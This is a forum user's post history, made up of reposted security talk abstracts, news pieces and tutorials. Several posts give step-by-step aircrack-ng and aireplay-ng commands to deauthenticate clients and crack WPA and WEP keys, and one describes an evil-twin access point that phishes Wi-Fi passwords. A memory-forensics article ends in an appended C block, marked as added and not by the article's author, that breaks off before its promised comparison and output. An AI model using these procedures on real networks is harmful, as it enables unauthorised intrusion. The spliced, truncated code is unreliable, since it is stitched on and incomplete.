Everything posted by Nytro
-
Yes, the n00b version
-
[h=1]Hacking WPA 2 Key - Evil Twin Method (No Bruteforce)[/h] In an earlier post, we've seen how to crack WPA-2 network keys using a dictionary. While that technique works, it could take an awfully long time, especially when brute forcing. In this technique, named 'Evil Twin', we take a different perspective on the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point, which looks exactly like his. When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually. For this example I created a service page, started apache and mysql to store the keys typed in a database. Song: BGNS - Sasas ARTICLE & FILES: http://technicdynamic.com/2011/12/hac... Check out my recommended wireless adapters!: http://www.technicdynamic.com/store/#... ---------- This video was produced in experimental laboratories under controlled circumstances; You can use these techniques only where you are authorized to do so legally. The author and/or contributors will not take responsibility for the viewer's actions.
-
[h=1]Hacktivity 2012 - Vivek Ramachandran - Cracking WPA/WPA2 Personal and Enterprise for Fun and Profit[/h] https://www.hacktivity.com/ In this talk, we will explore the bleeding edge techniques used to compromise and break into WPA/WPA2 networks - both Personal and Enterprise! We will cover attacks on PSK, Hole 196, WPS, WPA/WPA2 Enterprise. You will learn how to create honeypot and MITM attacks setups for PSK, PEAP, EAP-TTLS etc. and to leverage the cloud to crack WPA handshakes and break MS-CHAPv2 which is the inner authentication protocol for most PEAP and EAP-TTLS networks. You will walk away with all the knowledge you need to secure into most Enterprise Wi-Fi networks!
-
[h=1]How to crack a WPA encrypted wifi Network with Backtrack 5[/h] Please donate any amount of money to my paypal which is kivi12k@aol.com. This is a tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.
Steps:
1) airmon-ng
2) airmon-ng start wlan0
3) airodump-ng mon0
4) airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5) aireplay-ng -0 5 -a (bssid) mon0
6) aircrack-ng (filename)*.cap -w (dictionary location)
If you need any help feel free to PM me or shoot me an instant message; a donation would also be appreciated. You can instant message me at: AIM - kivi12k@aol.com, WINDOWS MESSENGER - kivi12k@hotmail.com, YAHOO MESSENGER - kivi12k@ymail.com
-
[h=1]PacSec 2011 Eric Filiol - Dynamic Cryptographic Backdoors to take over the TOR network[/h] secwest - World Emerging Security Technology. Video from PacSec, November 2011, Tokyo, Eric Filiol outlines potential threats to the TOR anonymity network from compromised cryptographic functions. (Reminder: the CanSecWest 2012 Call for Papers closes next week. See CanSecWest Applied Security Conference: Vancouver, British Columbia, Canada)
-
[h=1]DEFCON 2012 - Hacking Smart Meters[/h]DEFCON 2012 - Hacking Smart Meters - Part 1 of 5: DEFCON 2012 - Hacking Smart Meters - Part 2 of 5: DEFCON 2012 - Hacking Smart Meters - Part 3 of 5: DEFCON 2012 - Hacking Smart Meters - Part 4 of 5: DEFCON 2012 - Hacking Smart Meters - Part 5 of 5: "Looking Into the Eye of the Meter - When you look at a Smart Meter, it practically winks at you. Their Optical Port calls to you. It calls to criminals as well. But how do criminals interact with it? We will show you how they look into the eye of the meter. More specifically, this presentation will show how criminals gather information from meters to do their dirty work. From quick memory acquisition techniques to more complex hardware bus sniffing, the techniques outlined in this presentation will show how authentication credentials are acquired. Finally, a method for interacting with a meter's IR port will be introduced to show that vendor specific software is not necessary to poke a meter in the eye."
-
[h=1]DEFCON 19: Hacking Google Chrome OS (w speaker)[/h] Speakers: Kyle 'Kos' Osborn, Application Security Specialist, WhiteHat Security | Matt Johanson, Application Security Specialist, WhiteHat Security. Google recently announced Chrome OS powered computers, called Chromebooks, at Google I/O and the company is getting ready to market them to businesses as well as consumers. What's different about Chrome OS and Chromebooks, other than the entire user experience taking place exclusively in a Web browser (Google Chrome), is that everything takes place in the cloud. Email, document writing, calendaring, social networking - everything. From a security perspective this means that all website and Web browser attack techniques, such as Cross-Site Scripting, Cross-Site Request, and Clickjacking, have the potential of circumventing Chrome OS's security protections and exposing all the user's data. Two members of WhiteHat Security's Threat Research Center, Matt Johansen and Kyle Osborn, have spent months hacking away on Google's Cr-48 prototype laptops. They discovered a slew of serious and fundamental security design flaws that with no more than a single mouse click may victimize users by:
• Exposing all user email, contacts, and saved documents.
• Conducting high speed scans of their intranet and revealing active host IP addresses.
• Spoofing messaging in their Google Voice account.
• Taking over their Google account by stealing session cookies, and in some cases doing the same on other visited domains.
While Chrome OS and Chromebooks have some impressive and unique security features, they are not all encompassing. Google was informed of the findings, some vulnerabilities were addressed, bounties generously awarded, but many of the underlying weaknesses yet remain, including evil extensions being easily made available in the WebStore, the ability for payloads to go viral, and JavaScript malware surviving reboot.
With the cloud and web-based operating systems poised to make an impact on our computing future, Matt and Kyle are ready to share all their never-before-seen research through a series of on-stage demonstrations. For more information visit: DEF CON
-
[h=1]Shmoocon 2013: Wipe The Drive!!! - Techniques For Malware Persistence[/h] For more information and to download the video visit: ShmooCon 2013 - February 15-17 - ShmooCon 2013 Playlist Shmoocon 2013: Shmoocon 2013 - YouTube Speakers: Mark Baggett | Jake Williams Let's face it: sooner or later you will be owned. As a security professional, you (should) know that the best plan is to format the system drive, reinstall the operating system, and start over. But management has another plan. They know that rebuilding infrastructure from scratch involves costly downtime. The temptation to remove the obvious malware and declare the system clean is strong. In this session, we'll demonstrate eight less than obvious techniques that can be used to install secondary persistence techniques on a compromised Windows system. The point of the session is not to address specific techniques that can be used as secondary persistence mechanisms for malicious actors. The idea is to conclusively demonstrate that techniques of this type exist that hide deep in the registry and other system settings. We will show that these techniques hide even from memory forensics, the holy grail of "clean system" confirmation. Not that we consider it a substitute for formatting and re-installing the operating system, but we will be releasing a script that checks for the use of these specific techniques.
-
[h=1]Mohamad Yaich[/h]
[h=1]Buffer Overflow Primer Part 1 (Smashing the Stack)[/h]
[h=1]Buffer Overflow Primer Part 2 (Writing Exit Shellcode)[/h]
[h=1]Buffer Overflow Primer Part 3 (Executing Shellcode)[/h]
[h=1]Buffer Overflow Primer Part 4 (Disassembling Execve)[/h]
[h=1]Buffer Overflow Primer Part 5 (Shellcode for Execve)[/h]
[h=1]Buffer Overflow Primer Part 6 (Exploiting a Program)[/h]
[h=1]Buffer Overflow Primer Part 7 (Exploiting a Program Demo)[/h]
[h=1]Buffer Overflow Primer Part 8 (Return to Libc Demo)[/h]
Source: https://www.youtube.com/user/TunisiaViP/videos?sort=p&view=0&shelf_index=1
-
Andrew Whitaker [h=1]SEH Exploits Part 1[/h] [h=1]SEH Exploits Part 2 of 2[/h] SEH Exploit using Python, Ollydbg, SafeSEH Plug-in, and Metasploit.
-
[h=1]Cracking WPA2[/h] Andrew Whitaker Cracking WPA2 using Airmon-ng
-
I also found this: Image Host | Free web hosting for images with direct linking allowed. Use IMG Host to share pictures with friends or to post images on message boards, your MySpace profile or eBay auction. - Simple. If you have other alternatives, post them here, so we have something to choose from.
-
Test: I was looking for a site where I can upload images and also get a direct link, unlike that junk tinypic, which asks me for a CAPTCHA and doesn't give me a direct link. I found this: http://www.pixentral.com For a direct link, right click, copy image location. Simple and efficient. Screw tinypic. PS: Limitations: - max 2 MB - max 30 days
-
Happy birthday man, you said you'd buy the drinks
-
Jumping Out of IE’s Sandbox With One Click, by Dennis Fisher. Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft’s August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security Update for Internet Explorer. But hidden inside the big fix was a patch for a vulnerability that enabled a one-click escape of the IE sandbox. The vulnerability was discovered by researcher Fermin J. Serna, a former Microsoft security engineer, and it takes advantage of the way that IE handles some command line options in certain conditions. Serna found that the ElevationPolicy in IE will treat the Microsoft Diagnostic Tool (msdt.exe) as a medium-integrity process if the user requests it to do so. In IE, Protected Mode is the sandbox that is designed to prevent attackers from being able to use one bug in a low-level process to compromise the machine. “Funny thing is that CreateProcess() has a hook inside the LowIL IE process and if you try to CreateProcess(“msdt.exe”) it will get brokered to the IE Medium IL one and applied the Elevation policy there. Some sanitization happens to most of the parameters for security reasons (do not create a Medium IL process where the process token is too unrestricted),” Serna wrote in a blog post explaining the bug. “The vulnerability here is that msdt.exe (that due to its elevation policy will run as medium IL outside of any sandbox) has some interesting command line options. Concretely this one: /path .diagpkg file | .diagcfg file - Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package.
You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameter.” Serna said that using the vulnerability, he could cause the msdt.exe process to display some strings that he controls to the user. If the user clicks the continue button on the dialog box, his code will run and he’s escaped the sandbox in the browser. He said that executing the attack would be trivial under the right conditions. “Assuming you have code execution at the sandboxed process through some other bug (let’s say the common use after free problem all browsers suffer) then it is not easy but trivial. This sandbox escape vulnerability is not a memory corruption that can fail but a logical one that does not fail. The only requirement is the attacked user has to click a “continue” button on a dialog with attacker controlled messages. This is the reason for a one click versus a full 0 click where the user does not see anything,” Serna said via email. Source: Jumping Out of IE's Sandbox With One Click | Threatpost
-
How to Crack WEP Key With Backtrack 5 [wifi hacking] As announced before, we would be writing about wifi attacks and security. This post is the second part of our series on wifi attacks and security. In the first part we discussed various terminologies related to wifi attacks and security and discussed a couple of attacks. This post will also show you how one can easily crack WEP keys in no time.
Security Issues With WEP
WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001; the WEP protocol itself has some weaknesses which allow attackers to crack it in no time. The biggest flaw probably in a WEP key is that it supports only 40-bit encryption, which means that there are only 16 million possibilities. For more information on WEP flaws, kindly read the WEP flaws section here.
Requirements:
Here is what you would require to crack a WEP key:
1. Backtrack or any other Linux distro with aircrack-ng installed
2. A wifi adapter capable of injecting packets. For this tutorial I will use the Alfa AWUS036H, which is a very popular card and performs well with Backtrack. You can find compatible wifi card lists here.
Procedure:
First log in to your Backtrack / Linux and plug in your wifi adapter. Open a new console and type in the following command:
ifconfig wlan0 up
where wlan0 is the name of the wireless card; it can be different. To see all wireless cards connected to your system simply type in "iwconfig".
Putting your WiFi Adapter in Monitor Mode
To begin, you’ll need to first put your wireless adapter into monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. You can put your card into monitor mode by typing in the following command:
airmon-ng start (your interface)
Example:
airmon-ng start wlan0
Now a new interface mon0 will be created. You can see that the new interface is in monitor mode by entering "iwconfig mon0" as shown.
Finding a suitable Target
After putting your card into monitor mode, we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command:
airodump-ng mon0
BSSID shows the MAC address of the AP, CH shows the channel on which the AP is broadcasting, ESSID shows the name broadcast by the AP, and Cipher shows the encryption type. Now look out for a WEP protected network. In my case I’ll take “linksys“ as my target for the rest of the tutorial.
Attacking The Target
Now to crack the WEP key you'll have to capture the target's data into a file. To do this we use the airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection; otherwise the wireless card has to alternate between all channels. You can restrict the capture by giving the following command:
airodump-ng mon0 --bssid (bssid) -c (channel) -w (file name to save)
As my target is broadcasting on channel 6 and has the bssid "98:fc:11:c9:14:22", I give the following command and save the captured data as "RHAWEP":
airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
Using Aireplay to Speed up the cracking
Now you’ll have to capture at least 20,000 data packets to crack WEP. This can be done in two ways. The first one would be a passive attack: wait for a client to connect to the AP and then start capturing the data packets, but this method is very slow; it can take days or even weeks to capture that many data packets. The second method would be an active attack: this method is fast and only takes minutes to generate and inject that many packets. In an active attack you'll have to do a fake authentication (connect) with the AP, then you'll have to generate and inject packets. This can be done very easily by entering the following command:
aireplay-ng -1 3 -a (bssid of the target) (interface)
In our case we enter the following command:
aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
After doing a fake authentication, now it's time to generate and inject ARP packets. To do this you'll have to open a new Konsole simultaneously and type in the following command:
aireplay-ng -3 -b (bssid of target) -h (MAC address of mon0) (interface)
In our case we enter:
aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
If this step was successful you'll see a lot of data packets in the airodump capture as shown. Wait till it reaches 20,000 packets; best would be to wait till it reaches around 80,000 to 90,000 packets. It's simple: the more packets, the less time to crack. Once you’ve captured enough packets, close all the processes by clicking the close mark on the terminal.
Cracking WEP key using Aircrack
Now it's time to crack the WEP key from the captured data. Enter the following command in a new Konsole to crack the WEP key:
aircrack-ng (name of the file)
In our case we enter:
aircrack-ng RHAWEP-01.cap
Within a few minutes Aircrack will crack the WEP key as shown. Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP key. Hope you enjoyed this tutorial. For further doubts and clarifications please pass your comments. Source: Learn everything about window,hacking,buy e-gift vouchers
-
Poison Ivy RAT Spotted in Three New Attacks, by Michael Mimoso. The Poison Ivy remote access Trojan may be old, but it’s not losing favor with nation states that continue to make it the centerpiece of targeted attacks. Three groups of hackers, reportedly all with ties to China and possibly related in terms of their funding and training, are currently managing campaigns using the RAT to steal data from organizations and monitor individuals’ activities. Researchers at FireEye said the three campaigns target different industries yet share some of the same builder tools, employ passwords written in the same semantic pattern, and use phishing emails in their campaigns that are written in English using a Chinese language keyboard. So much for the notion of targeted, persistent attacks requiring zero-day malware. “There is a noticeable infrastructure built around using this tool; it’s clear they’ve trained a number of people to use and operate it,” said Darien Kindlund, manager of threat intelligence at FireEye. “It’s effective and there’s no need to change their tactics, which is why they’re still using it.” Kindlund said, however, that enterprise security managers and operations teams can become complacent when it comes to Poison Ivy, dismissing it as a crimeware tool and missing its potential to still infect many machines as it moves laterally looking for more vulnerable machines or data it targets. “What’s easy for these threat actors is they’re using easy-to-use tools that are point-and-click and it becomes easy to blend in with crimeware groups, easy to blend into the noise and discount their presence when a defender identifies a Poison Ivy infection,” Kindlund said. “They might remediate a single infected machine rather than think it’s one of 50 compromises and a large-scale infection.
That gives the adversary more time to change tactics and move laterally to other systems, making it harder to detect.” Another reason Poison Ivy still finds favor with attackers is that, unlike Gh0stRAT or Dark Comet, it’s difficult to detect when Poison Ivy beacons out to its command and control infrastructure in order to receive more instructions. “Compared to Gh0stRAT, which uses zlib compression to obfuscate communication out, if a network operator sees that traffic beaconing out, it’s easy to decode that traffic to figure out what walked out the door,” Kindlund said. “Poison Ivy uses Camellia encryption, which makes it more difficult to figure out what walked out the door.” The three attacks currently are fundamentally familiar. The first, named admin@338 for the password used by the attacker, targets international financial firms that specialize in the analysis of global or country-specific economic policies. It uses malicious email attachments to infect endpoints with Poison Ivy, which then downloads additional malware to steal intelligence in order to monetize insider information to make a market play or for geo-political reasons, Kindlund said. The second attack, named th3bug for its password, spiked last year, FireEye said. It focuses on higher education and international health care and high tech firms in order to steal intellectual property or new research that has yet to be published by a university team. Most of these are watering hole attacks where a regional website frequented by the targets is compromised and exploit code is injected onto the victim’s machine that redirects them to Poison Ivy. The third attack, dubbed menuPass, has been the most active of the three and dates back to 2009, spiking last year. It targets the defense industry and international government agencies trying to steal military intelligence.
Spear phishing campaigns include attachments infected with Poison Ivy that are meant to look like a purchase order or price quote that would be fairly specific to the victim, Kindlund said. “They’ve done their homework and looked at the trust relationships of the target—who does this defense contractor do business with—and spoof an email from that partner and send an email through that channel,” Kindlund said. “These three groups have ties back to China; they all use a separate command and control infrastructure, but all three have a backend presence in that country.” Meanwhile, the company is releasing a free tool based on the open source ChopShop kit developed by MITRE Corp. The module is Poison Ivy specific, similar to other modules built for Gh0stRAT, and will allow a security or network operations person to decode Poison Ivy traffic. *Poison Ivy image via uwdigitalcollections‘ Flickr photostream, Creative Commons Source: Poison Ivy RAT Spotted in Three New China Attacks | Threatpost Old schoolers
-
Fraud
-
http://suport.romtelecom.ro/app/answers/detail/a_id/90/~/cum-pot-apela-1930---v%E3%A2nz%E4%83ri-%E5%9Fi-rela%E5%B3ii-cu-clien%E5%B3ii-din-str%E4%83in%E4%83tate%3F http://www.romtelecom.ro/termeni-legali/termeni-si-conditii-myaccount http://economie.hotnews.ro/stiri-telecom-7174542-cum-ajung-abonatii-romtelecom-clienti-fara-voie-societatii-asigurari-astra.htm
-
Inside the Mind of a Famous Hacker When he was just 15 years old, Michael “MafiaBoy” Calce managed to shut down several major websites including CNN, Dell, Amazon, Yahoo!, eBay, and E-Trade with a series of denial of service attacks. Now, more than a decade later, he talks about how the hacker culture has changed and what users can do to protect themselves. How He Toppled the Web Giants In 2000, Calce targeted CNN.com after another hacker claimed the site would be impossible to bring down because of its “advanced networks” and “huge traffic numbers.” He managed to slow down CNN’s site for nearly two hours. Denial of service attacks involve bombarding a site or application with so many requests that the server is unable to keep up. Calce modified a denial of service attack written by another hacker and trained approximately 200 university networks under his control on a specific target. The attack against Yahoo! was by accident, Calce said. He had put the IP addresses into the script, and then gone to school, forgetting the script was still running. He came home to find his computer had crashed, and didn’t realize what had happened until he heard the news reports later. Calce’s activities were “illegal, reckless and, in many ways, simply stupid,” he said, adding that he really had not understood the consequences of his actions. “It’s So Easy It’s Scary” More than a decade later, it’s easier to launch attacks now than it was then, Calce said. A lot of the companies are completely unaware that they are at risk, and that needs to change. Back when he was actively targeting sites, you had to work and build your own arsenal of tools before launching an attack. Now there are hacker desktops and ready-to-go tools that anyone can download, install, and go. “If you’re interested and you want to be a hacker, you can be a hacker in 30 minutes,” Calce said.
Different Mentality, Motivations Calce and his fellow hackers were driven by curiosity and a desire to understand how things worked. That is where the term “hacker” originated, after all. A hacker refers to anybody interested in manipulating technology to do something other than its original purpose. “That’s not necessarily a bad thing,” Calce said. “Everyone at that point in time was running tests and seeing what they could do and what they could infiltrate,” Calce said. The current generation is motivated by money, or a desire to destroy. “It’s much more about monetary gain, whereas we were pushing the status quo,” Calce said. And even when there doesn’t seem to be an obvious financial motive, that doesn’t mean it isn’t there. Hacktivist groups such as “Anonymous” and “Lulzsec” are a “different breed,” Calce said. While they have political motivations, some of them do have malicious goals. They are not pure white-hat, or pure black-hat, but more grey-hat hackers, Calce said. There will be more hacktivism since people have figured out how to use technology to fight back and draw more attention to their cause. “I don’t condone what they’re doing, but I understand their point,” Calce said. Safe Security Online With attack motivations shifting to monetary gain, the attack focus has also shifted, and individual users are just as likely to be targeted as large companies. Users need to use strong passwords to protect their accounts. They need to be long and complex. Password managers help keep track of strong passwords, Calce said. They should also think about installing personal firewall software on their computers to block malicious traffic. A firewall can also warn you when an application is trying to access the Internet. If you are not using Bluetooth, it should be turned off so that other devices cannot connect to your computer.
And finally, users should beware of open wireless networks because it is incredibly easy to eavesdrop on what you are doing, and people don’t realize this, Calce said. Hacking will never go away, and users can take some steps to protect themselves, but ultimately, organizations need to invest in security to protect their end users, Calce said. Source: Inside the Mind of a Famous Hacker | ZoneAlarm Security Blog
-
[h=1]Web Framework Vulnerabilities - Abraham Kang[/h] from OWASP AppSec USA. Title: Web Framework Vulnerabilities. Abstract: This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is a trimmed-down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understanding of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify. Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked in application security for over 10 years, with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and has presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. ***** Date: Friday October 26, 2012 3:00pm - 3:45pm Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel. Track: Attack Source: Web Framework Vulnerabilties - Abraham Kang on Vimeo
-
[h=1]Visualizing Recovered Executables from Memory Images[/h]jessekornblum (jessekornblum) wrote, I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using 2008: This post will explain what's happening in that picture—how PE executables are loaded and recovered—and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process. When executables are loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections needs to page aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions. When we recover executables from memory, we can use the PE header to map the sections back to their size and locations as they were on the disk. Generally memory forensics tools don't undo the other modifications made by the Windows loader. The changes made in memory remain the new version we recover. In addition, due to paging and other limitations we don't always get all of the pages of the executable from memory. They could have been paged out, are invalid, or were never loaded in the first place. That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations for an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image. 
In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated gifs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256. Here's a representation of the original executable from the disk as produced with colorize. This image is a little different than some of the others I've posted before. Instead of being vertically oriented, it's horizontal. The data starts at the top left, and then goes down and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture: $ colorize -o -w 512 cmd.exe and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory aligned, not disk aligned. Here's the command line to run the plugin: $ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe Here's how we can colorize it: $ mv executable.3256.exe executable-procmemdump.3256.exe $ colorize -o -w 512 executable-procmemdump.3256.exe Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp There's a lot going on here, but things will get more clear with a third image. 
For the third picture we'll recover the executable again, but this time realigning the sections back to how they were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when it was loaded. We can do this using the procexedump plugin, like this:

$ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output
Volatile Systems Volatility Framework 2.3_alpha
Process(V)  ImageBase   Name                  Result
----------  ----------  --------------------  ------
0x8153f480  0x4ad00000  cmd.exe               OK: executable.3256.exe

We repeat the process for colorizing this sample:

$ mv executable.3256.exe executable-procexedump.3256.exe
$ colorize -o -w 512 executable-procexedump.3256.exe

Which produces this image:

http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp

First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different:

$ md5deep -b cmd.exe executable-procexedump.3256.exe
eeb024f2c81f0d55936fb825d21a91d6  cmd.exe
ff8a9a332a9471e1bf8d5cebb941fc66  executable-procexedump.3256.exe

Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]:

$ ssdeep -bda cmd.exe executable-procexedump.3256.exe
executable-procexedump.3256.exe matches cmd.exe (66)

There's also a match with the sdhash similarity detection tool [5]:

$ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe
cmd.exe|executable-procexedump.3256.exe|046

(You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.)

Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures.
Combined with some annotations on the pictures, here's the result:

There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?)

The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together. We can compare the two files at the byte level and then colorize the result:

$ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat
$ colorize -o -w 512 orig-to-exe.dat

Here's the result:

http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp

Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, are the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image--hence the speckled pattern. In the changes to the executable you can clearly see a pattern of dashed red lines.

Finally, we can visualize the changes between the in-memory representation of the file and the disk representation of the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump:

The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, being added by the Windows loader to page align the first section of the executable.

[h=3]References[/h]
[1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon.
Jesse Kornblum is not sponsored or approved by, or affiliated with Verizon.
[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF.
[3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project.
[4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep.
[5] Vassil Roussev, sdhash, http://sdhash.org/.

Source: jessekornblum: Visualizing Recovered Executables from Memory Images
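The two operations the post relies on, realigning a memory-dumped PE back to its disk layout (what procexedump does) and comparing the result byte by byte against the original (what filecompare does), as an added C example. This is not Kornblum's code and not Volatility's implementation; the PE it works on is a toy image constructed inline (two sections, one page deliberately left unrecovered, one constructed loader-style fixup in .data), and the text map it prints stands in for a row of colorize pixels.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE      0x1000  /* SectionAlignment: the loader places sections on page boundaries */
#define MEM_SIZE  0x4000  /* constructed in-memory image: headers + two page-aligned sections */
#define DISK_SIZE 0x2000  /* the same toy executable as laid out on disk */

static uint32_t rd32(const uint8_t *p, size_t o) {
    return (uint32_t)p[o] | (uint32_t)p[o + 1] << 8 | (uint32_t)p[o + 2] << 16 | (uint32_t)p[o + 3] << 24;
}
static uint16_t rd16(const uint8_t *p, size_t o) { return (uint16_t)(p[o] | (p[o + 1] << 8)); }
static void wr32(uint8_t *p, size_t o, uint32_t v) { for (int i = 0; i < 4; i++) p[o + i] = (uint8_t)(v >> (8 * i)); }
static void wr16(uint8_t *p, size_t o, uint16_t v) { p[o] = (uint8_t)v; p[o + 1] = (uint8_t)(v >> 8); }

/* What procexedump does: read the section table from the dumped headers and copy every section
 * from VirtualAddress (page aligned, memory) back to PointerToRawData (file aligned, disk).
 * Pages that were not in the dump arrive as zeros and stay zeros; loader fixups are left in place.
 * Returns the reconstructed file size, or 0 if the headers are unusable. */
size_t realign_to_disk(const uint8_t *mem, size_t memlen, uint8_t *out, size_t outcap) {
    if (memlen < 0x40 || mem[0] != 'M' || mem[1] != 'Z') return 0;
    size_t pe = rd32(mem, 0x3c);                              /* e_lfanew */
    if (pe + 24 + 64 > memlen || memcmp(mem + pe, "PE\0\0", 4) != 0) return 0;
    uint16_t nsec  = rd16(mem, pe + 6);                       /* IMAGE_FILE_HEADER.NumberOfSections */
    uint16_t optsz = rd16(mem, pe + 20);                      /* IMAGE_FILE_HEADER.SizeOfOptionalHeader */
    uint32_t hdrsz = rd32(mem, pe + 24 + 60);                 /* IMAGE_OPTIONAL_HEADER.SizeOfHeaders */
    size_t sect = pe + 24 + optsz, disk_size = hdrsz;
    if (hdrsz > outcap || hdrsz > memlen || sect + 40u * nsec > memlen) return 0;
    memset(out, 0, outcap);
    memcpy(out, mem, hdrsz);                                  /* headers keep their offset */
    for (uint16_t i = 0; i < nsec; i++) {
        size_t h = sect + 40u * i;
        uint32_t va = rd32(mem, h + 12), raw = rd32(mem, h + 16), ptr = rd32(mem, h + 20);
        if ((size_t)va + raw > memlen || (size_t)ptr + raw > outcap) return 0;
        memcpy(out + ptr, mem + va, raw);
        if ((size_t)ptr + raw > disk_size) disk_size = (size_t)ptr + raw;
    }
    return disk_size;
}

/* Headers of the toy PE (all values constructed for this demo). Section table:
 *   .text  VirtualAddress 0x1000  VirtualSize 0x1800  PointerToRawData 0x400   SizeOfRawData 0x1800
 *   .data  VirtualAddress 0x3000  VirtualSize 0x300   PointerToRawData 0x1c00  SizeOfRawData 0x400 */
static void write_headers(uint8_t *h) {
    const size_t pe = 0x80, opt = pe + 24, optsz = 224;      /* 224 = PE32 optional header size */
    size_t s = opt + optsz;
    memset(h, 0, 0x400);
    h[0] = 'M'; h[1] = 'Z';
    wr32(h, 0x3c, (uint32_t)pe);
    memcpy(h + pe, "PE\0\0", 4);
    wr16(h, pe + 4, 0x14c);          /* Machine: i386 */
    wr16(h, pe + 6, 2);              /* NumberOfSections */
    wr16(h, pe + 20, (uint16_t)optsz);
    wr16(h, opt, 0x10b);             /* Magic: PE32 */
    wr32(h, opt + 32, PAGE);         /* SectionAlignment */
    wr32(h, opt + 36, 0x200);        /* FileAlignment */
    wr32(h, opt + 56, MEM_SIZE);     /* SizeOfImage */
    wr32(h, opt + 60, 0x400);        /* SizeOfHeaders */
    memcpy(h + s, ".text\0\0\0", 8); wr32(h, s + 8, 0x1800); wr32(h, s + 12, 0x1000); wr32(h, s + 16, 0x1800); wr32(h, s + 20, 0x400);
    s += 40;
    memcpy(h + s, ".data\0\0\0", 8); wr32(h, s + 8, 0x300);  wr32(h, s + 12, 0x3000); wr32(h, s + 16, 0x400);  wr32(h, s + 20, 0x1c00);
}

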